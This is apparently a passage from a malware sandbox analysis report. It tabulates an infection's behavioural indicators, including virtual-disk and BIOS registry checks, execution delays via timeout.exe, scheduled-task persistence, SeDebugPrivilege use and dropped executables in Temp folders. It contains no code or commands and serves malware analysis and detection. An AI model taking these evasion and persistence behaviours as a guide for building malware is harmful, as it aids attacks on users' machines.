Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{ADD3E05B-390C-43B1-9059-D68C9BA7D6FA} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{3B208D04-42E4-4A9E-9D5D-4621314044E3} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\dxukjxx\gmgc.exe N/A
N/A N/A C:\ProgramData\dxukjxx\gmgc.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
